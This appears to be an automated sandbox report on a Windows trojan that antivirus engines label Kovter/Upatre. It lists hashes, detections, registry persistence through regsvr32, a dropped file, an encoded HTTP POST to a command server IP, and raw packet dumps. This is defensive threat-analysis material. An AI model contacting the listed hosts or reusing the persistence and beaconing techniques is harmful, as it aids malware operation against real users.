Analysis Date2015-09-17 15:25:26
MD5fe51edcd5a92cb1017dac25076b9df7f
SHA1da6935aebc6cf1cdaf86810746e324e70c384cd5

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: d0aa46516bc32ee4ed5407439718b419 sha1: 6e4665a69136c6ee6030e0073e68402f47ef86ad size: 365568
Section.rdata md5: 4f4725a7e6a3c934528b5505c73a5d27 sha1: 8be7096ab011311cf95feda2ae4406cb7f5a46d0 size: 112640
Section.data md5: 4c7727f5077894ef6f37ef876754ecb5 sha1: 11543490735b53e8ccd6c62ff132fab875b371a1 size: 50688
Section.rsrc md5: 6f887b6a452d0e5d906e5e6e871d36e8 sha1: 8ec8afbc5044316a26011d72ce410098f98c0dd2 size: 31744
Section.reloc md5: 9cece16fc2586d1135f8429b82e661de sha1: 2ffdf4498fd10c764fbdb110cec05fbe11904284 size: 12288
Timestamp2015-09-02 01:18:34
Pdb pathH:\moved\referenced\GPRS\challengi.pdb
PackerMicrosoft Visual C++ ?.?
PEhash914afbe2540626b31c4a7b00792b10ac0fb80aa8
IMPhash0ca8fd97d93758c8e87d0cc6211bc089
AVCA (E-Trust Ino)no_virus
AVF-SecureGen:Variant.Mikey.23405
AVDr. WebTrojan.MulDrop6.3116
AVClamAVno_virus
AVArcabit (arcavir)Gen:Variant.Mikey.23405
AVBullGuardGen:Variant.Mikey.23405
AVPadvishno_virus
AVVirusBlokAda (vba32)no_virus
AVCAT (quickheal)no_virus
AVTrend Microno_virus
AVKasperskyTrojan-Downloader.Win32.Upatre.eqmh
AVZillya!Downloader.Upatre.Win32.52139
AVEmsisoftGen:Variant.Mikey.23405
AVIkarusTrojan.Win32.Kovter
AVFrisk (f-prot)no_virus
AVAuthentiumW32/Trojan.BAXR-8795
AVMalwareBytesTrojan.Agent.ED
AVMicroWorld (escan)Gen:Variant.Mikey.23405
AVMicrosoft Security EssentialsTrojan:Win32/Kovter!rfn
AVK7Trojan ( 004c672c1 )
AVBitDefenderGen:Variant.Mikey.23405
AVFortinetW32/Upatre.D!tr.dldr
AVSymantecTrojan.Ransomlock.AK
AVGrisoft (avg)Pakes.RFR
AVEset (nod32)Win32/Kovter.D
AVAlwil (avast)Malware-gen:Win32:Malware-gen
AVAd-AwareGen:Variant.Mikey.23405
AVTwisterW32.Kovter.D.eyxa
AVAvira (antivir)TR/Crypt.Xpack.249273
AVMcafeeGenericR-EKO!FE51EDCD5A92
AVRisingno_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates Processregsvr32.exe

Process
↳ regsvr32.exe

Creates Processregsvr32.exe

Process
↳ regsvr32.exe

RegistryHKEY_LOCAL_MACHINE\SOFTWARE\2a89521acd\c984f294 ➝
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\\x00
RegistryHKEY_LOCAL_MACHINE\software\2a89521acd\7bf7927d ➝
864\\x00
RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\regsvr32.exe ➝
8888
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
RegistryHKEY_CURRENT_USER\software\2a89521acd\7bf7927d ➝
864\\x00
RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1206 ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1206 ➝
NULL
RegistryHKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\regsvr32.exe ➝
8888
RegistryHKEY_CURRENT_USER\SOFTWARE\2a89521acd\c984f294 ➝
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\\x00
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\bufym\bufym.exe
Creates File\Device\Afd\AsyncConnectHlp
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\microsoft[1].htm
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\48.133.68[1].htm
Deletes Filec:\malware.exe
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\microsoft[1].htm
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\48.133.68[1].htm
Creates Process"C:\WINDOWS\system32\regsvr32.exe"
Creates Process"C:\WINDOWS\system32\regsvr32.exe"
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates MutexDE7B2F08C5C35678
Creates MutexGlobal\A0B9737978FF60B0
Winsock DNSmicrosoft.com
Winsock DNS48.133.68.62

Process
↳ "C:\WINDOWS\system32\regsvr32.exe"

Creates Mutex5734B585673D7847

Process
↳ "C:\WINDOWS\system32\regsvr32.exe"

Network Details:

DNSmicrosoft.com
Type: A
134.170.185.46
DNSmicrosoft.com
Type: A
134.170.188.221
DNSa767.dscms.akamai.net
Type: A
23.3.98.10
DNSa767.dscms.akamai.net
Type: A
23.3.98.32
DNSdownload.microsoft.com
Type: A
HTTP GEThttp://microsoft.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://48.133.68.62/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://download.microsoft.com/download/0/8/c/08c19fa4-4c4f-4ffb-9d6c-150906578c9e/NetFx20SP1_x86.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP192.168.1.1:1031 ➝ 134.170.185.46:80
Flows TCP192.168.1.1:1032 ➝ 48.133.68.62:80
Flows TCP192.168.1.1:1033 ➝ 170.26.181.108:80
Flows TCP192.168.1.1:1034 ➝ 109.113.250.134:80
Flows TCP192.168.1.1:1035 ➝ 48.133.68.62:80
Flows TCP192.168.1.1:1036 ➝ 166.69.185.171:443
Flows TCP192.168.1.1:1037 ➝ 23.3.98.10:80
Flows TCP192.168.1.1:1040 ➝ 132.35.119.135:80
Flows TCP192.168.1.1:1041 ➝ 166.46.144.206:80
Flows TCP192.168.1.1:1042 ➝ 111.201.43.1:80
Flows TCP192.168.1.1:1043 ➝ 52.79.142.149:443
Flows TCP192.168.1.1:1044 ➝ 87.144.78.186:8080
Flows TCP192.168.1.1:1045 ➝ 62.53.183.185:80
Flows TCP192.168.1.1:1047 ➝ 111.255.153.143:80
Flows TCP192.168.1.1:1048 ➝ 75.251.248.218:80
Flows TCP192.168.1.1:1052 ➝ 185.158.195.219:80
Flows TCP192.168.1.1:1053 ➝ 118.90.149.27:443
Flows TCP192.168.1.1:1054 ➝ 50.103.225.29:8080
Flows TCP192.168.1.1:1055 ➝ 40.232.110.18:80
Flows TCP192.168.1.1:1056 ➝ 179.42.254.142:80
Flows TCP192.168.1.1:1057 ➝ 164.180.21.226:8080
Flows TCP192.168.1.1:1058 ➝ 38.78.237.170:80
Flows TCP192.168.1.1:1059 ➝ 17.36.58.137:80
Flows TCP192.168.1.1:1060 ➝ 62.69.93.244:80

Raw Pcap
0x00000000 (00000)   47455420 2f204854 54502f31 2e310d0a   GET / HTTP/1.1..
0x00000010 (00016)   55736572 2d416765 6e743a20 4d6f7a69   User-Agent: Mozi
0x00000020 (00032)   6c6c612f 342e3020 28636f6d 70617469   lla/4.0 (compati
0x00000030 (00048)   626c653b 204d5349 4520362e 303b2057   ble; MSIE 6.0; W
0x00000040 (00064)   696e646f 7773204e 5420352e 313b2053   indows NT 5.1; S
0x00000050 (00080)   56313b20 2e4e4554 20434c52 20322e30   V1; .NET CLR 2.0
0x00000060 (00096)   2e353037 3237290d 0a486f73 743a206d   .50727)..Host: m
0x00000070 (00112)   6963726f 736f6674 2e636f6d 0d0a4361   icrosoft.com..Ca
0x00000080 (00128)   6368652d 436f6e74 726f6c3a 206e6f2d   che-Control: no-
0x00000090 (00144)   63616368 650d0a0d 0a                  cache....

0x00000000 (00000)   ad                                    .

0x00000000 (00000)   504f5354 202f2048 5454502f 312e310d   POST / HTTP/1.1.
0x00000010 (00016)   0a436f6e 74656e74 2d547970 653a2061   .Content-Type: a
0x00000020 (00032)   70706c69 63617469 6f6e2f78 2d777777   pplication/x-www
0x00000030 (00048)   2d666f72 6d2d7572 6c656e63 6f646564   -form-urlencoded
0x00000040 (00064)   0d0a5573 65722d41 67656e74 3a204d6f   ..User-Agent: Mo
0x00000050 (00080)   7a696c6c 612f342e 30202863 6f6d7061   zilla/4.0 (compa
0x00000060 (00096)   7469626c 653b204d 53494520 362e303b   tible; MSIE 6.0;
0x00000070 (00112)   2057696e 646f7773 204e5420 352e313b    Windows NT 5.1;
0x00000080 (00128)   20535631 3b202e4e 45542043 4c522032    SV1; .NET CLR 2
0x00000090 (00144)   2e302e35 30373237 290d0a48 6f73743a   .0.50727)..Host:
0x000000a0 (00160)   2034382e 3133332e 36382e36 320d0a43    48.133.68.62..C
0x000000b0 (00176)   6f6e7465 6e742d4c 656e6774 683a2033   ontent-Length: 3
0x000000c0 (00192)   38340d0a 43616368 652d436f 6e74726f   84..Cache-Contro
0x000000d0 (00208)   6c3a206e 6f2d6361 6368650d 0a0d0a49   l: no-cache....I
0x000000e0 (00224)   32305269 73553955 6c366134 6d513137   20RisU9Ul6a4mQ17
0x000000f0 (00240)   724e426e 6e776333 33542b70 53544548   rNBnnwc33T+pSTEH
0x00000100 (00256)   316c7a37 3974795a 424f462f 526c7355   1lz79tyZBOF/RlsU
0x00000110 (00272)   7175712f 4a65764f 534e6447 456f6e6e   quq/JevOSNdGEonn
0x00000120 (00288)   44486950 79765a79 6439416d 32555264   DHiPyvZyd9Am2URd
0x00000130 (00304)   4e6d3245 6d4c6c59 646b3372 42766e61   Nm2EmLlYdk3rBvna
0x00000140 (00320)   4e7a6f56 3244535a 75317467 6f306d43   NzoV2DSZu1tgo0mC
0x00000150 (00336)   79443043 524e6e49 6c556d43 39675a47   yD0CRNnIlUmC9gZG
0x00000160 (00352)   58795438 4a464575 344d4c52 6f684b6a   XyT8JFEu4MLRohKj
0x00000170 (00368)   76715733 75367948 71346769 73373879   vqW3u6yHq4gis78y
0x00000180 (00384)   4a32476f 45594778 736f7078 3769336f   J2GoEYGxsopx7i3o
0x00000190 (00400)   486b6262 4e71705a 41415658 684a6431   HkbbNqpZAAVXhJd1
0x000001a0 (00416)   48734839 7555572f 7a7a6373 4d306d77   HsH9uUW/zzcsM0mw
0x000001b0 (00432)   7170494c 546a2f2b 626e6f70 49786732   qpILTj/+bnopIxg2
0x000001c0 (00448)   6c627852 33314d49 485a7261 6f75544c   lbxR31MIHZraouTL
0x000001d0 (00464)   696c6743 4c776667 437a6831 70534a53   ilgCLwfgCzh1pSJS
0x000001e0 (00480)   36464737 46367644 77516342 32375850   6FG7F6vDwQcB27XP
0x000001f0 (00496)   6c534c65 41482b48 334c5354 527a594e   lSLeAH+H3LSTRzYN
0x00000200 (00512)   4b6d4173 6a70645a 4a493258 6d596462   KmAsjpdZJI2XmYdb
0x00000210 (00528)   4f74332b 74325154 5a64704f 6e2b2b78   Ot3+t2QTZdpOn++x
0x00000220 (00544)   4268476d 38546a6b 676a6845 47736234   BhGm8TjkgjhEGsb4
0x00000230 (00560)   79477655 46723768 2f766e48 4f4b3875   yGvUFr7h/vnHOK8u
0x00000240 (00576)   63445a62 46484132 43554238 4e6b3465   cDZbFHA2CUB8Nk4e
0x00000250 (00592)   4f646569 504b5943 4f4e4131 513d3d     OdeiPKYCONA1Q==

0x00000000 (00000)   47455420 2f646f77 6e6c6f61 642f302f   GET /download/0/
0x00000010 (00016)   382f632f 30386331 39666134 2d346334   8/c/08c19fa4-4c4
0x00000020 (00032)   662d3466 66622d39 6436632d 31353039   f-4ffb-9d6c-1509
0x00000030 (00048)   30363537 38633965 2f4e6574 46783230   06578c9e/NetFx20
0x00000040 (00064)   5350315f 7838362e 65786520 48545450   SP1_x86.exe HTTP
0x00000050 (00080)   2f312e31 0d0a5573 65722d41 67656e74   /1.1..User-Agent
0x00000060 (00096)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000070 (00112)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000080 (00128)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000090 (00144)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x000000a0 (00160)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x000000b0 (00176)   6f73743a 20646f77 6e6c6f61 642e6d69   ost: download.mi
0x000000c0 (00192)   63726f73 6f66742e 636f6d0d 0a436163   crosoft.com..Cac
0x000000d0 (00208)   68652d43 6f6e7472 6f6c3a20 6e6f2d63   he-Control: no-c
0x000000e0 (00224)   61636865 0d0a0d0a 68697320 69732074   ache....his is t
0x000000f0 (00240)   68652072 65616c2d 6d6f6465 20746573   he real-mode tes
0x00000100 (00256)   74207061 67652e2e 2e3c2f68 333e0a09   t page...</h3>..
0x00000110 (00272)   093c696d 67207372 633d226c 6f676f2e   .<img src="logo.
0x00000120 (00288)   67696622 3e0a2020 3c2f626f 64793e0a   gif">.  </body>.
0x00000130 (00304)   3c2f6874 6d6c3e0a                     </html>.

0x00000000 (00000)   a9                                    .

0x00000000 (00000)   a5                                    .

0x00000000 (00000)   b5                                    .

0x00000000 (00000)   76                                    v

0x00000000 (00000)   60                                    `

0x00000000 (00000)   7c                                    |

0x00000000 (00000)   aa                                    .

0x00000000 (00000)   79                                    y

0x00000000 (00000)   be                                    .

0x00000000 (00000)   b1                                    .

0x00000000 (00000)   aa                                    .

0x00000000 (00000)   9a                                    .

0x00000000 (00000)   94                                    .

0x00000000 (00000)   b6                                    .

0x00000000 (00000)   9a                                    .

0x00000000 (00000)   93                                    .

0x00000000 (00000)   ae                                    .

0x00000000 (00000)   b8                                    .

0x00000000 (00000)   3d                                    =

0x00000000 (00000)   6c                                    l


Strings